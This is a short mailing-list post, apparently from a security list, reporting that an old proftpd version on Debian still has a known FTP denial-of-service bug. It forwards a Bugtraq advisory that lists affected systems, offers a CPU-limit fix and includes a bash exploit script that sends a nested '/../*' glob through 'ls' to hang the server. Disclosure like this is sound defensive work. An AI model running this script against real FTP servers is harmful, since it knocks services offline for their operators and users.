I'm using proftpd 1.2.0pre10-2.0potato1, tried this vulnerability, and still affects to this version of proftpd. I see that ftp://ftp.debian.org is still using this version, and I think also affected.
Thanks Didit ------- Start of forwarded message ------- From: "Enrico Kern" <[EMAIL PROTECTED]> To: bugtraq@securityfocus.com Organization: http://freemail.web.de/ Subject: Multiple-Vendor-FTP-Vuln. (old?) Date: 8/20/01 20:20:35 Hi, i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on = many new Linux-Dist.. When a user logged in in ftp and type the ls command the in.ftpd takes over 90 percent cpu-usage and execute = the command 2 or 3x than the full system hang up. it also works in = console. I wonder that is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ = in march 01, but it still works so i post it again. affected: RedHat Linux 7.x Linux Mandrake 8.0 SuSE Linux 7.2 FreeBSD 4.3 AiX V 4.3 other? Not vuln.: latest Wu-Ftpd Windows FTP-Server Exploit: #!/bin/bash=20 ftp -n FTP-SERVER<<\end=20 quot user anonymous bin quot pass [EMAIL PROTECTED] ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* bye=20 end=20 Fix: set cpu-limit for your anonymous user. -------- End of forwarded message --------
